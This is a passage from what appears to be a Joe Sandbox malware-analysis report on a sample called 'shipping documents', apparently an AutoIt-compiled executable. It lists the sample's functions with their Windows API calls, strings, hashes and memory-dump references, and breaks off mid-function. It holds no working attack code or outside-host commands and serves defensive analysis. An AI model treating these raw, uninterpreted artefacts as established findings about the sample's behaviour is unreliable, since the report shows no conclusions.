DISPLAY, xrefs: 006C799B
msctls_progress32, xrefs: 006C7A4F
AutoIt v3, xrefs: 006C793E

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: afa7fb8ba34f0f47517689703c3625598ff51920d440461615955a439a837ba5
Instruction ID: 17767a799c6830c428b946acc4f5dbe986e4793b0158ff5c801e04b913a10dd1
Opcode Fuzzy Hash: afa7fb8ba34f0f47517689703c3625598ff51920d440461615955a439a837ba5
Instruction Fuzzy Hash: A7A19371A41215BFEB14DBA8DC4AFEE7BBAEB44710F048119FA15A72E0D774AD00CB64

Function 006BAF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 006BAF89
GetDriveTypeW.KERNEL32(?,006DFAC0,?,\\.\,006DF910), ref: 006BB066
SetErrorMode.KERNEL32(00000000,006DFAC0,?,\\.\,006DF910), ref: 006BB1C4

Strings

\\.\, xrefs: 006BAFDB
RAID, xrefs: 006BB162
ATA, xrefs: 006BB13F
SCSI, xrefs: 006BB131
USB, xrefs: 006BB15B
Fibre, xrefs: 006BB154
Network, xrefs: 006BB0A4
Fixed, xrefs: 006BB0AE
ATAPI, xrefs: 006BB138
SATA, xrefs: 006BB177
iSCSI, xrefs: 006BB169
1394, xrefs: 006BB146
CDROM, xrefs: 006BB09A
SSD, xrefs: 006BB0F1
Virtual, xrefs: 006BB18C
SSA, xrefs: 006BB14D
RAMDisk, xrefs: 006BB090
Unknown, xrefs: 006BB086, 006BB12A
SAS, xrefs: 006BB170
FileBackedVirtual, xrefs: 006BB193
MMC, xrefs: 006BB185
Removable, xrefs: 006BB0B8
PhysicalDrive, xrefs: 006BB012

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: c7ef7ca08f8b0d193ae1038fc2d257de159765f021295955f641f4903542e217
Instruction ID: 819c819179c410b5c7a4d52e212091e0343d4cb69e939158c613430ca977392a
Opcode Fuzzy Hash: c7ef7ca08f8b0d193ae1038fc2d257de159765f021295955f641f4903542e217
Instruction Fuzzy Hash: 2051A4F0684305EBCB10EB18C9529FD73F3AB54341F24A119E44AA72D2C7B99D87DB52

Function 00656A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00656A91
__wcsnicmp.LIBCMT ref: 00656AA9
__wcsnicmp.LIBCMT ref: 00656AC1
__wcsnicmp.LIBCMT ref: 00656AD9
__wcsnicmp.LIBCMT ref: 00656AF1
__wcsnicmp.LIBCMT ref: 00656B09
__wcsnicmp.LIBCMT ref: 00656B21
__wcsnicmp.LIBCMT ref: 00656B35
__wcsnicmp.LIBCMT ref: 00656B76
__wcsnicmp.LIBCMT ref: 00656B8A
__wcsnicmp.LIBCMT ref: 00656B9E
__wcsnicmp.LIBCMT ref: 00656BB2

Strings

#cs, xrefs: 00656B2F, 00656B84
#OnAutoItStartRegister, xrefs: 00656AD3
#include-once, xrefs: 00656AEB
#ce, xrefs: 00656BAC
Cannot parse #include, xrefs: 0068E819
#requireadmin, xrefs: 00656ABB
Unterminated group of comments, xrefs: 0068E82C
Bad directive syntax error, xrefs: 0068E743
#comments-end, xrefs: 00656B98
#include, xrefs: 00656B03
#notrayicon, xrefs: 00656AA3
#comments-start, xrefs: 00656B1B, 00656B70
#pragma compile, xrefs: 00656A8B

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: b71aee1af4650b4916e15ebda2a0368a56d03084b5c29b920000dda39a90b29a
Instruction ID: dab05a5e9689974be4cb3ee9c14ea593c94d04fda2d315836abba58a5677028e
Opcode Fuzzy Hash: b71aee1af4650b4916e15ebda2a0368a56d03084b5c29b920000dda39a90b29a
Instruction Fuzzy Hash: 1D8127B0A00355BBCB20BB24CC93FAE776BAF15301F448129FD45AB282EB61DA59D355

Function 006DAB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 006DAB99
SetTextColor.GDI32(?,?), ref: 006DAB9D
GetSysColorBrush.USER32(0000000F), ref: 006DABB3
GetSysColor.USER32(0000000F), ref: 006DABBE
CreateSolidBrush.GDI32(?), ref: 006DABC3
GetSysColor.USER32(00000011), ref: 006DABDB
CreatePen.GDI32(00000000,00000001,00743C00), ref: 006DABE9
SelectObject.GDI32(?,00000000), ref: 006DABFA
SetBkColor.GDI32(?,00000000), ref: 006DAC03
SelectObject.GDI32(?,?), ref: 006DAC10
InflateRect.USER32(?,000000FF,000000FF), ref: 006DAC2F
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006DAC46
GetWindowLongW.USER32(00000000,000000F0), ref: 006DAC5B
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 006DACA7
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 006DACCE
InflateRect.USER32(?,000000FD,000000FD), ref: 006DACEC
DrawFocusRect.USER32(?,?), ref: 006DACF7
GetSysColor.USER32(00000011), ref: 006DAD05
SetTextColor.GDI32(?,00000000), ref: 006DAD0D
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 006DAD21
SelectObject.GDI32(?,006DA869), ref: 006DAD38
DeleteObject.GDI32(?), ref: 006DAD43
SelectObject.GDI32(?,?), ref: 006DAD49
DeleteObject.GDI32(?), ref: 006DAD4E
SetTextColor.GDI32(?,?), ref: 006DAD54
SetBkColor.GDI32(?,?), ref: 006DAD5E

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: dc2e55f7e8bea9658e878891c1255dbf1c60116eb13a4a3f53c96361ad474250
Instruction ID: 2d6d7b8363d8eb81812a8d549b510ad3fc9055a9a13fcd7cbacaacda37087531
Opcode Fuzzy Hash: dc2e55f7e8bea9658e878891c1255dbf1c60116eb13a4a3f53c96361ad474250
Instruction Fuzzy Hash: 2A615E71D01218EFDF119FA4DC48EAE7BBAEB08320F148126F916AB2A1D7759D40DB90

Function 006D8C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 006D8D34
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006D8D45
CharNextW.USER32(0000014E), ref: 006D8D74
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 006D8DB5
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 006D8DCB
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006D8DDC
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 006D8DF9
SetWindowTextW.USER32(?,0000014E), ref: 006D8E45
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 006D8E5B
SendMessageW.USER32(?,00001002,00000000,?), ref: 006D8E8C
_memset.LIBCMT ref: 006D8EB1
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 006D8EFA
_memset.LIBCMT ref: 006D8F59
SendMessageW.USER32(?,00001053,000000FF,?), ref: 006D8F83
SendMessageW.USER32(?,00001074,?,00000001), ref: 006D8FDB
SendMessageW.USER32(?,0000133D,?,?), ref: 006D9088
InvalidateRect.USER32(?,00000000,00000001), ref: 006D90AA
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006D90F4
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006D9121
DrawMenuBar.USER32(?), ref: 006D9130
SetWindowTextW.USER32(?,0000014E), ref: 006D9158

Strings

0, xrefs: 006D90C2

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: b6a85f3a41445e3ed933bf52a0a1a944006b76da458ace55637745f6fda9d5c9
Instruction ID: 0cf68ad6a15807188ffc3bd0f4e9bc10fcceccec7086217a1a4b5846b5ad783e
Opcode Fuzzy Hash: b6a85f3a41445e3ed933bf52a0a1a944006b76da458ace55637745f6fda9d5c9
Instruction Fuzzy Hash: EAE16F70D01219AEDB209F64CC88AEE7B7AEF05710F10815AF9169B3D1DB749A81DF60

Function 006D4B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 006D4C51
GetDesktopWindow.USER32 ref: 006D4C66
GetWindowRect.USER32(00000000), ref: 006D4C6D
GetWindowLongW.USER32(?,000000F0), ref: 006D4CCF
DestroyWindow.USER32(?), ref: 006D4CFB
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 006D4D24
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006D4D42
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 006D4D68
SendMessageW.USER32(?,00000421,?,?), ref: 006D4D7D
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 006D4D90
IsWindowVisible.USER32(?), ref: 006D4DB0
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 006D4DCB
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 006D4DDF
GetWindowRect.USER32(?,?), ref: 006D4DF7
MonitorFromPoint.USER32(?,?,00000002), ref: 006D4E1D
GetMonitorInfoW.USER32(00000000,?), ref: 006D4E37
CopyRect.USER32(?,?), ref: 006D4E4E
SendMessageW.USER32(?,00000412,00000000), ref: 006D4EB9

Strings

tooltips_class32, xrefs: 006D4D1D
(, xrefs: 006D4E2A
0, xrefs: 006D4BFC

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 51eeea6f448c1219de97e8b3e027f5d7f0705ed41b40110771533bc0f52167aa
Instruction ID: a2335055d38dcf2aecc2f3024dde6194252c7d38ad60bcae4bf686651098e9e0
Opcode Fuzzy Hash: 51eeea6f448c1219de97e8b3e027f5d7f0705ed41b40110771533bc0f52167aa
Instruction Fuzzy Hash: EFB15A71A05340AFDB44DF24C845B6ABBE6BF84314F00891EF9999B3A1DB71EC05CB95

Function 006B46D6 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 006B46E8
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 006B470E
_wcscpy.LIBCMT ref: 006B473C
_wcscmp.LIBCMT ref: 006B4747
_wcscat.LIBCMT ref: 006B475D
_wcsstr.LIBCMT ref: 006B4768
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 006B4784
_wcscat.LIBCMT ref: 006B47CD
_wcscat.LIBCMT ref: 006B47D4
_wcsncpy.LIBCMT ref: 006B47FF

Strings

\VarFileInfo\Translation, xrefs: 006B477C
%u.%u.%u.%u, xrefs: 006B4862
StringFileInfo\, xrefs: 006B4757
DefaultLangCodepage, xrefs: 006B47E7
04090000, xrefs: 006B47BA

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: c56269964d082ff2f3ab59e4e767664a9835e74b703c8aa9f51f830007318c87
Instruction ID: 6fd29ac1a70590d622dabf0763e85af306e6052ddf2a95c59f963a586a199a56
Opcode Fuzzy Hash: c56269964d082ff2f3ab59e4e767664a9835e74b703c8aa9f51f830007318c87
Instruction Fuzzy Hash: 564117B1A00215BAD710A7749C42EFF77BEDF41710F04416EF909A6283EF34AA4197A9

Function 006527D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006528BC
GetSystemMetrics.USER32(00000007), ref: 006528C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006528EF
GetSystemMetrics.USER32(00000008), ref: 006528F7
GetSystemMetrics.USER32(00000004), ref: 0065291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00652939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00652949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0065297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00652990
GetClientRect.USER32(00000000,000000FF), ref: 006529AE
GetStockObject.GDI32(00000011), ref: 006529CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 006529D5

Part of subcall function 00652344: GetCursorPos.USER32(?), ref: 00652357
Part of subcall function 00652344: ScreenToClient.USER32(007167B0,?), ref: 00652374
Part of subcall function 00652344: GetAsyncKeyState.USER32(00000001), ref: 00652399
Part of subcall function 00652344: GetAsyncKeyState.USER32(00000002), ref: 006523A7

SetTimer.USER32(00000000,00000000,00000028,00651256), ref: 006529FC

Strings

AutoIt v3 GUI, xrefs: 00652974

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 84c960cc49c1854c6a6dd0a4c61ad138f1bb41c9731305034c767358078f45f3
Instruction ID: bb0a6846b3f16f7ffc7403b01894f91058f1fb19239a789f1be93b8eb048c997
Opcode Fuzzy Hash: 84c960cc49c1854c6a6dd0a4c61ad138f1bb41c9731305034c767358078f45f3
Instruction Fuzzy Hash: 75B16D71A0020AEFDB14DFA8DC55BEE7BB6FB08311F108229FA16A62D0DB74D945CB54

Function 006D4069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 006D40F6
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 006D41B6

Strings

GETSUBITEMCOUNT, xrefs: 006D4141
DESELECT, xrefs: 006D42A4
GETTEXT, xrefs: 006D415F
SELECTINVERT, xrefs: 006D4286
VIEWCHANGE, xrefs: 006D4375
SELECT, xrefs: 006D4250
FINDITEM, xrefs: 006D4329
GETITEMCOUNT, xrefs: 006D4128
GETSELECTEDCOUNT, xrefs: 006D4199
SELECTCLEAR, xrefs: 006D4235
ISSELECTED, xrefs: 006D41C1
SELECTALL, xrefs: 006D421D
GETSELECTED, xrefs: 006D42E4

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: bcd364c92a926a01e56477df169ff49366aa5da23db2f06fb58ce95639537881
Instruction ID: 3f047c2a32fca083b2bc124acf35e01e09beaeb0d01bf4ee7087c8e80681e56b
Opcode Fuzzy Hash: bcd364c92a926a01e56477df169ff49366aa5da23db2f06fb58ce95639537881
Instruction Fuzzy Hash: 57A18F30614301DBCB54EF24C851A6AB3E7AF85314F14896DB89A9B7D2DF30ED0ACB65

Function 006C52F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 006C5309
LoadCursorW.USER32(00000000,00007F8A), ref: 006C5314
LoadCursorW.USER32(00000000,00007F00), ref: 006C531F
LoadCursorW.USER32(00000000,00007F03), ref: 006C532A
LoadCursorW.USER32(00000000,00007F8B), ref: 006C5335
LoadCursorW.USER32(00000000,00007F01), ref: 006C5340
LoadCursorW.USER32(00000000,00007F81), ref: 006C534B
LoadCursorW.USER32(00000000,00007F88), ref: 006C5356
LoadCursorW.USER32(00000000,00007F80), ref: 006C5361
LoadCursorW.USER32(00000000,00007F86), ref: 006C536C
LoadCursorW.USER32(00000000,00007F83), ref: 006C5377
LoadCursorW.USER32(00000000,00007F85), ref: 006C5382
LoadCursorW.USER32(00000000,00007F82), ref: 006C538D
LoadCursorW.USER32(00000000,00007F84), ref: 006C5398
LoadCursorW.USER32(00000000,00007F04), ref: 006C53A3
LoadCursorW.USER32(00000000,00007F02), ref: 006C53AE
GetCursorInfo.USER32(?), ref: 006C53BE
GetLastError.KERNEL32(00000001,00000000), ref: 006C53E9

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: cb861079d6f4e7388c9010d3cca8d011eda11db6271efbb30b1f60fa58041c78
Instruction ID: 776b55ef65e3e53df467acc0af35c5f96eae51f5f016c7828152c4128a450b75
Opcode Fuzzy Hash: cb861079d6f4e7388c9010d3cca8d011eda11db6271efbb30b1f60fa58041c78
Instruction Fuzzy Hash: 0C418470E043196ADB109FBA8C49D6FFFF9EF51B10B10452FE50AE7290DAB8A441CE61

Function 006AAA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 006AAAA5
__swprintf.LIBCMT ref: 006AAB46
_wcscmp.LIBCMT ref: 006AAB59
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 006AABAE
_wcscmp.LIBCMT ref: 006AABEA
GetClassNameW.USER32(?,?,00000400), ref: 006AAC21
GetDlgCtrlID.USER32(?), ref: 006AAC73
GetWindowRect.USER32(?,?), ref: 006AACA9
GetParent.USER32(?), ref: 006AACC7
ScreenToClient.USER32(00000000), ref: 006AACCE
GetClassNameW.USER32(?,?,00000100), ref: 006AAD48
_wcscmp.LIBCMT ref: 006AAD5C
GetWindowTextW.USER32(?,?,00000400), ref: 006AAD82
_wcscmp.LIBCMT ref: 006AAD96

Part of subcall function 0067386C: _iswctype.LIBCMT ref: 00673874

Strings

%s%u, xrefs: 006AAB40

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 84440bce43fe94f69daa10f2727204ee78734dca43a8f24aed93fab824f23aa3
Instruction ID: d1207824b86c077531e082b3f3ee812a8770e92b689141c9544252d0f87691da
Opcode Fuzzy Hash: 84440bce43fe94f69daa10f2727204ee78734dca43a8f24aed93fab824f23aa3
Instruction Fuzzy Hash: 0DA1B171604306ABD714EFA4C884BEAB7EAFF05315F00852EF99A92691D730ED45CF92

Function 006AB397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 006AB3DB
_wcscmp.LIBCMT ref: 006AB3EC
GetWindowTextW.USER32(00000001,?,00000400), ref: 006AB414
CharUpperBuffW.USER32(?,00000000), ref: 006AB431
_wcscmp.LIBCMT ref: 006AB44F
_wcsstr.LIBCMT ref: 006AB460
GetClassNameW.USER32(00000018,?,00000400), ref: 006AB498
_wcscmp.LIBCMT ref: 006AB4A8
GetWindowTextW.USER32(00000002,?,00000400), ref: 006AB4CF
GetClassNameW.USER32(00000018,?,00000400), ref: 006AB518
_wcscmp.LIBCMT ref: 006AB528
GetClassNameW.USER32(00000010,?,00000400), ref: 006AB550
GetWindowRect.USER32(00000004,?), ref: 006AB5B9

Strings

@, xrefs: 006AB3BC
ThumbnailClass, xrefs: 006AB4A3, 006AB523

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 6907444894725730d38d0acb2a8826dc6b705934a87ec53d86ed29f5df971c26
Instruction ID: 7aba9761298b337f3d90df91745c85073aa57f303adadf95e93275b72c5b01d9
Opcode Fuzzy Hash: 6907444894725730d38d0acb2a8826dc6b705934a87ec53d86ed29f5df971c26
Instruction Fuzzy Hash: 8B819D710042059BDB04EF10D885FAABBEAEF45314F04A56EFD898A297DB34DD49CFA1

Function 006DC8EE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623

